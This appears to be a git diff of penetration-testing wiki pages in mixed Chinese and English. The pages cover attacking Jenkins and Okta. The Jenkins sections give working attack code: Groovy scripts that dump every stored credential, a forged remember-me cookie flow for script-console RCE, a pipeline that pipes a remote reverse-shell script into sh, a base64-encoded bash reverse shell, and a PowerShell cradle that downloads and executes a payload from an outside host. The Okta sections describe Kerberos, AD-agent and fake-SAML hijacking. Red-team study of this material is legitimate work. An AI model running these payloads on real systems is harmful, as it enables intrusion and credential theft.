Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
- `hudson.util.Secret`: 用于通用 secrets
- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: 用于某些类型的 credentials
- `jenkins.model.Jenkins.crumbSalt`: [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery) 使用;以及
- `hudson.util.Secret`: used for generic secrets;
- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
### Credentials Access
Credentials 可以 **作用域到 global providers**`/credentials/`),任何配置的项目都可以访问,或者可以作用域到 **特定项目**`/job/<project-name>/configure`),因此仅能从该特定项目访问。
Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job/<project-name>/configure`) and therefore only accessible from the specific project.
根据 [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/):处于作用域内的 credentials 会在 pipeline 中不受限制地可用。为了 **防止在构建日志中意外泄露**credentials 会在常规输出中被 **掩码**,因此对 `env`Linux)或 `set`Windows)的调用,或打印其环境或参数的程序不会在构建日志中向本不应访问这些 credentials 的用户泄露它们。
According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
**这就是为什么为了 exfiltrate credentials 攻击者需要例如对其进行 base64 编码。**
**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
### Secrets in plugin/job configs on disk
不要假定 secrets 只存在于 `credentials.xml`。许多插件在 `$JENKINS_HOME/*.xml` 下以 **自己的全局 XML** 持久化 secrets或在每个 job 的 `$JENKINS_HOME/jobs/<JOB>/config.xml`有时甚至以明文形式存放UI 掩码并不保证加密存储)。如果你获得了文件系统的读取权限,请枚举这些 XML 并搜索明显的 secret 标签。
```bash
# Global plugin configs
ls -l /var/lib/jenkins/*.xml
grep -R "password\\|token\\|SecretKey\\|credentialId" /var/lib/jenkins/*.xml
# Per-job configs
find /var/lib/jenkins/jobs -maxdepth 2 -name config.xml -print -exec grep -H "password\\|token\\|SecretKey" {} \\;
```
## 参考资料
## References
- [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
@@ -101,6 +90,8 @@ find /var/lib/jenkins/jobs -maxdepth 2 -name config.xml -print -exec grep -H "pa
- [https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery)
- [https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials)
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
- [https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/](https://www.nccgroup.com/research-blog/story-of-a-hundred-vulnerable-jenkins-plugins/)
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,104 +2,107 @@
{{#include ../../banners/hacktricks-training.md}}
在这篇博客文章中可以找到将Jenkins中的本地文件包含漏洞转化为RCE的好方法[https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
这是一个AI生成的摘要关于如何利用任意cookie的构造来获取RCE利用本地文件读取直到我有时间自己创建摘要
This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
### 攻击前提
### Attack Prerequisites
- **功能要求:** 必须启用“记住我”(默认设置)。
- **访问级别:** 攻击者需要整体/读取权限。
- **秘密访问:** 能够读取关键文件中的二进制和文本内容。
- **Feature Requirement:** "Remember me" must be enabled (default setting).
- **Access Levels:** Attacker needs Overall/Read permissions.
- **Secret Access:** Ability to read both binary and textual content from key files.
### 详细利用过程
### Detailed Exploitation Process
#### 第一步:数据收集
#### Step 1: Data Collection
**用户信息检索**
**User Information Retrieval**
- 访问每个用户的用户配置和秘密,从`$JENKINS_HOME/users/*.xml`中收集:
- **用户名**
- **用户种子**
- **时间戳**
- **密码哈希**
- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
- **Username**
- **User seed**
- **Timestamp**
- **Password hash**
**密钥提取**
**Secret Key Extraction**
- 提取用于签名cookie的加密密钥
- **秘密密钥:** `$JENKINS_HOME/secret.key`
- **主密钥:** `$JENKINS_HOME/secrets/master.key`
- **MAC密钥文件:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
- Extract cryptographic keys used for signing the cookie:
- **Secret Key:** `$JENKINS_HOME/secret.key`
- **Master Key:** `$JENKINS_HOME/secrets/master.key`
- **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
#### 第二步Cookie伪造
#### Step 2: Cookie Forging
**令牌准备**
**Token Preparation**
- **计算令牌过期时间:**
- **Calculate Token Expiry Time:**
```javascript
tokenExpiryTime = currentServerTimeInMillis() + 3600000 // 将当前时间加一小时
```
```javascript
tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
```
- **连接令牌数据:**
- **Concatenate Data for Token:**
```javascript
token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
```
```javascript
token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
```
**MAC密钥解密**
**MAC Key Decryption**
- **解密MAC密钥文件**
- **Decrypt MAC Key File:**
```javascript
key = toAes128Key(masterKey) // 将主密钥转换为AES128密钥格式
decrypted = AES.decrypt(macFile, key) // 解密.mac文件
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")
```
```javascript
key = toAes128Key(masterKey) // Convert master key to AES128 key format
decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")
```
**签名计算**
**Signature Computation**
- **计算HMAC SHA256**
- **Compute HMAC SHA256:**
```javascript
mac = HmacSHA256(token, macKey) // 使用令牌和MAC密钥计算HMAC
tokenSignature = bytesToHexString(mac) // 将MAC转换为十六进制字符串
```
```javascript
mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
```
**Cookie编码**
**Cookie Encoding**
- **生成最终Cookie**
- **Generate Final Cookie:**
```javascript
cookie = base64.encode(
username + ":" + tokenExpiryTime + ":" + tokenSignature
) // Base64编码cookie数据
```
```javascript
cookie = base64.encode(
username + ":" + tokenExpiryTime + ":" + tokenSignature
) // Base64 encode the cookie data
```
#### 第三步:代码执行
#### Step 3: Code Execution
**会话认证**
**Session Authentication**
- **获取CSRF和会话令牌**
-`/crumbIssuer/api/json`发送请求以获取`Jenkins-Crumb`
- 从响应中捕获`JSESSIONID`该ID将与记住我cookie一起使用。
- **Fetch CSRF and Session Tokens:**
- Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
- Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
**命令执行请求**
**Command Execution Request**
- **发送带有Groovy脚本的POST请求**
- **Send a POST Request with Groovy Script:**
```bash
curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"
```
```bash
curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"
```
- Groovy脚本可用于在Jenkins环境中执行系统级命令或其他操作。
- Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
提供的示例curl命令演示了如何使用必要的头和cookie向Jenkins发送请求以安全地执行任意代码。
The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,11 +1,12 @@
# Jenkins Groovy 中转储秘密
# Jenkins Dumping Secrets from Groovy
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
> 请注意,这些脚本只会列出 `credentials.xml` 文件中的秘密,但 **构建配置文件** 可能也会有 **更多凭据**
> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
You can **dump all the secrets from the Groovy Script console** in `/script` running this code
您可以通过运行以下代码在 `/script`**从 Groovy 脚本控制台转储所有秘密**
```java
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
@@ -41,45 +42,51 @@ showRow("something else", it.id, '', '', '')
return
```
#### 或者这个:
#### or this one:
```java
import java.nio.charset.StandardCharsets;
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.Credentials.class
com.cloudbees.plugins.credentials.Credentials.class
)
for (c in creds) {
println(c.id)
if (c.properties.description) {
println(" description: " + c.description)
}
if (c.properties.username) {
println(" username: " + c.username)
}
if (c.properties.password) {
println(" password: " + c.password)
}
if (c.properties.passphrase) {
println(" passphrase: " + c.passphrase)
}
if (c.properties.secret) {
println(" secret: " + c.secret)
}
if (c.properties.secretBytes) {
println(" secretBytes: ")
println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
println("")
}
if (c.properties.privateKeySource) {
println(" privateKey: " + c.getPrivateKey())
}
if (c.properties.apiToken) {
println(" apiToken: " + c.apiToken)
}
if (c.properties.token) {
println(" token: " + c.token)
}
println("")
println(c.id)
if (c.properties.description) {
println(" description: " + c.description)
}
if (c.properties.username) {
println(" username: " + c.username)
}
if (c.properties.password) {
println(" password: " + c.password)
}
if (c.properties.passphrase) {
println(" passphrase: " + c.passphrase)
}
if (c.properties.secret) {
println(" secret: " + c.secret)
}
if (c.properties.secretBytes) {
println(" secretBytes: ")
println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
println("")
}
if (c.properties.privateKeySource) {
println(" privateKey: " + c.getPrivateKey())
}
if (c.properties.apiToken) {
println(" apiToken: " + c.apiToken)
}
if (c.properties.token) {
println(" token: " + c.token)
}
println("")
}
```
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,37 +1,42 @@
# Jenkins RCE 创建/修改管道
# Jenkins RCE Creating/Modifying Pipeline
{{#include ../../banners/hacktricks-training.md}}
## 创建新管道
## Creating a new Pipeline
在“新项目”(可在 `/view/all/newJob` 访问)中选择 **Pipeline:**
In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
![](<../../images/image (235).png>)
**Pipeline 部分** 中写入 **reverse shell**
In the **Pipeline section** write the **reverse shell**:
![](<../../images/image (285).png>)
```groovy
pipeline {
agent any
agent any
stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}
```
最后点击 **Save****Build Now**,管道将被执行:
Finally click on **Save**, and **Build Now** and the pipeline will be executed:
![](<../../images/image (228).png>)
## 修改管道
## Modifying a Pipeline
如果您可以访问某个已配置管道的配置文件,您可以直接 **修改它,附加您的反向 shell**,然后执行它或等待它被执行。
If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,36 +1,39 @@
# Jenkins RCE 创建/修改项目
# Jenkins RCE Creating/Modifying Project
{{#include ../../banners/hacktricks-training.md}}
## 创建项目
## Creating a Project
此方法非常嘈杂,因为您必须创建一个全新的项目(显然,这仅在用户被允许创建新项目时有效)。
This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
1. **创建一个新项目**(自由风格项目),点击“新建项目”或在`/view/all/newJob`
2. 在**构建**部分设置**执行 shell**,并粘贴一个 powershell Empire 启动器或一个 meterpreter powershell(可以使用 _unicorn_ 获得)。使用 _PowerShell.exe_ 启动有效载荷,而不是使用 _powershell_
3. 点击**立即构建**
1. 如果**立即构建**按钮没有出现,您仍然可以转到**配置** --> **构建触发器** --> `定期构建`,并设置一个 cron `* * * * *`
2. 除了使用 cron您还可以使用配置“**远程触发构建**”,只需设置一个 api 令牌名称以触发作业。然后转到您的用户配置文件并**生成一个 API 令牌**(将此 API 令牌称为您用于触发作业的 api 令牌)。最后,使用以下命令触发作业:**`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
3. Click **Build now**
1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
![](<../../images/image (165).png>)
## 修改项目
## Modifying a Project
转到项目并检查**您是否可以配置任何**项目(查找“配置按钮”):
Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
![](<../../images/image (265).png>)
如果您**看不到任何**配置**按钮**,那么您**可能无法**配置它(但检查所有项目,因为您可能能够配置其中一些而不是其他项目)。
If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
或者**尝试访问路径** `/job/<proj-name>/configure` `/me/my-views/view/all/job/<proj-name>/configure` \_\_ 在每个项目中(示例:`/job/Project0/configure` `/me/my-views/view/all/job/Project0/configure`)。
Or **try to access to the path** `/job/<proj-name>/configure` or `/me/my-views/view/all/job/<proj-name>/configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
## 执行
## Execution
如果您被允许配置项目,您可以**使其在构建成功时执行命令**
If you are allowed to configure the project you can **make it execute commands when a build is successful**:
![](<../../images/image (98).png>)
点击**保存**并**构建**项目,您的**命令将被执行**。\
如果您不是在执行反向 shell 而是简单命令,您可以**在构建的输出中查看命令的输出**。
Click on **Save** and **build** the project and your **command will be executed**.\
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -4,21 +4,24 @@
## Jenkins RCE with Groovy Script
这比在Jenkins中创建新项目要安静得多
This is less noisy than creating a new project in Jenkins
1. Go to _path_jenkins/script_
2. Inside the text box introduce the script
1. 转到 _path_jenkins/script_
2. 在文本框中输入脚本
```python
def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"
```
您可以使用以下命令执行: `cmd.exe /c dir`
**linux** 中,您可以这样做: **`"ls /".execute().text`**
You could execute a command using: `cmd.exe /c dir`
如果您需要在文本中使用 _引号_ _单引号_,可以使用 _"""PAYLOAD"""_(三重双引号)来执行有效载荷。
In **linux** you can do: **`"ls /".execute().text`**
If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
**Another useful groovy script** is (replace \[INSERT COMMAND]):
**另一个有用的 groovy 脚本** 是(替换 \[INSERT COMMAND]
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
@@ -26,7 +29,9 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
### Linux中的反向Shell
### Reverse shell in linux
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
@@ -34,20 +39,28 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
### Windows中的反向Shell
您可以准备一个带有PS反向Shell的HTTP服务器并使用Jeking下载并执行它
### Reverse shell in windows
You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
```python
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
```
### 脚本
您可以使用 [**这个脚本**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py) 自动化此过程。
### Script
You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
You can use MSF to get a reverse shell:
您可以使用 MSF 获取反向 shell
```
msf> use exploit/multi/http/jenkins_script_console
```
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -2,113 +2,116 @@
{{#include ../../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
[Okta, Inc.](https://www.okta.com/) 在身份和访问管理领域因其基于云的软件解决方案而受到认可。这些解决方案旨在简化和保护各种现代应用程序的用户身份验证。它们不仅满足希望保护敏感数据的公司的需求,还满足希望将身份控制集成到应用程序、网络服务和设备中的开发人员的需求。
[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品,包括但不限于:
The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
- **单点登录 (SSO)**:通过允许在多个应用程序中使用一组登录凭据来简化用户访问。
- **多因素身份验证 (MFA)**:通过要求多种验证形式来增强安全性。
- **生命周期管理**:自动化用户帐户的创建、更新和停用过程。
- **通用目录**:实现用户、组和设备的集中管理。
- **API 访问管理**:保护和管理对 API 的访问。
- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
- **Universal Directory**: Enables centralized management of users, groups, and devices.
- **API Access Management**: Secures and manages access to APIs.
这些服务共同旨在加强数据保护并简化用户访问提高安全性和便利性。Okta 解决方案的多功能性使其成为各个行业的热门选择,适合大型企业、小公司和个人开发人员。截至 2021 年 9 月的最后更新Okta 被认为是身份和访问管理 (IAM) 领域的一个重要实体。
These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
> [!CAUTION]
> Okta 的主要目标是为不同用户和组配置对外部应用程序的访问。如果您设法在 Okta 环境中 **破坏管理员权限**,您将很可能能够 **破坏公司使用的所有其他平台**
> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
> [!TIP]
> 要对 Okta 环境进行安全审查,您应该请求 **管理员只读访问**
> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
### 摘要
### Summary
**用户**(可以是 **存储在 Okta 中,** 从配置的 **身份提供者** 登录或通过 **Active Directory** LDAP 进行身份验证)。\
这些用户可以在 **组** 内。\
还有 **身份验证器**:不同的身份验证选项,如密码和多种 2FA如 WebAuthn、电子邮件、电话、Okta Verify(它们可以启用或禁用)...
There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
These users can be inside **groups**.\
There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
然后,有与 Okta 同步的 **应用程序**。每个应用程序将与 Okta 有一些 **映射** 以共享信息(例如电子邮件地址、名字等)。此外,每个应用程序必须在 **身份验证策略** 中,指明用户 **访问** 应用程序所需的 **身份验证器**
Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
> [!CAUTION]
> 最强大的角色是 **超级管理员**
> The most powerful role is **Super Administrator**.
>
> 如果攻击者以管理员身份破坏 Okta所有 **信任 Okta 的应用程序** 将很可能 **被破坏**
> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
## 攻击
## Attacks
### 定位 Okta 门户
### Locating Okta Portal
通常公司的门户将位于 **companyname.okta.com**。如果没有,请尝试简单的 **companyname.****变体**。如果找不到,也可能该组织有一个 **CNAME** 记录,如 **`okta.companyname.com`** 指向 **Okta 门户**
Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
### 通过 Kerberos 登录 Okta
### Login in Okta via Kerberos
如果 **`companyname.kerberos.okta.com`** 是活动的,**Kerberos 用于 Okta 访问**,通常会绕过 **MFA** 对于 **Windows** 用户。要在 AD 中查找 Kerberos 身份验证的 Okta 用户,请使用 **`getST.py`** 运行 **适当的参数**。在获得 **AD 用户票证** 后,使用 Rubeus Mimikatz 等工具将其 **注入** 到受控主机中,确保 **`clientname.kerberos.okta.com` Internet 选项的 "Intranet" 区域**。访问特定 URL 应返回 JSON "OK" 响应,表示 Kerberos 票证被接受,并授予访问 Okta 仪表板的权限。
If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
破坏 **Okta 服务帐户与委派 SPN 使得 Silver Ticket 攻击成为可能**。然而Okta 使用 **AES** 进行票证加密,需要拥有 AES 密钥或明文密码。使用 **`ticketer.py` 为受害者用户生成票证**,并通过浏览器传递以进行 Okta 身份验证。
Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)****
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### 劫持 Okta AD 代理
### Hijacking Okta AD Agent
该技术涉及 **访问服务器上的 Okta AD 代理**,该代理 **同步用户并处理身份验证**。通过检查和解密 **`OktaAgentService.exe.config`** 中的配置,特别是使用 **DPAPI** 的 AgentToken攻击者可以潜在地 **拦截和操纵身份验证数据**。这不仅允许 **监控** **捕获用户凭据** 在 Okta 身份验证过程中以明文形式,还可以 **响应身份验证尝试**,从而实现未经授权的访问或通过 Okta 提供通用身份验证(类似于“万能钥匙”)。
This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)****
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### 作为管理员劫持 AD
### Hijacking AD As an Admin
该技术涉及通过首先获取 OAuth 代码来劫持 Okta AD 代理,然后请求 API 令牌。该令牌与 AD 域相关联,并且 **连接器被命名以建立一个假 AD 代理**。初始化允许代理 **处理身份验证尝试**,通过 Okta API 捕获凭据。可用自动化工具来简化此过程,提供在 Okta 环境中拦截和处理身份验证数据的无缝方法。
This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment.
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)****
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Okta SAML 提供者
### Okta Fake SAML Provider
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)****
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
该技术涉及 **部署一个假 SAML 提供者**。通过使用特权帐户在 Okta 框架中集成外部身份提供者 (IdP),攻击者可以 **控制 IdP随意批准任何身份验证请求**。该过程包括在 Okta 中设置 SAML 2.0 IdP操纵 IdP 单点登录 URL 通过本地 hosts 文件进行重定向,生成自签名证书,并配置 Okta 设置以匹配用户名或电子邮件。成功执行这些步骤允许以任何 Okta 用户的身份进行身份验证,绕过对单个用户凭据的需求,显著提高访问控制,可能在不被注意的情况下进行。
The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner.
### 使用 Evilgnix 针对 Okta 门户的钓鱼
### Phishing Okta Portal with Evilgnix
[**这篇博客文章**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) 中解释了如何准备针对 Okta 门户的钓鱼活动。
In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal.
### 同事冒充攻击
### Colleague Impersonation Attack
每个用户可以拥有和修改的 **属性**(如电子邮件或名字)可以在 Okta 中配置。如果一个 **应用程序** 将用户可以 **修改****属性** 作为 ID 进行 **信任**,他将能够 **在该平台上冒充其他用户**
The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**.
因此,如果该应用程序信任字段 **`userName`**,您可能无法更改它(因为通常无法更改该字段),但如果它信任例如 **`primaryEmail`**,您可能能够 **将其更改为同事的电子邮件地址** 并冒充它(您需要访问该电子邮件并接受更改)。
Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change).
请注意,这种冒充取决于每个应用程序的配置。只有那些信任您修改的字段并接受更新的应用程序将受到影响。\
因此,该应用程序应该启用此字段(如果存在):
Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\
Therefore, the app should have this field enabled if it exists:
<figure><img src="../../images/image (175).png" alt=""><figcaption></figcaption></figure>
我还见过其他易受攻击的应用程序,但在 Okta 设置中没有该字段(最终不同的应用程序配置不同)。
I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently).
找出您是否可以在每个应用程序上冒充任何人的最佳方法是尝试一下!
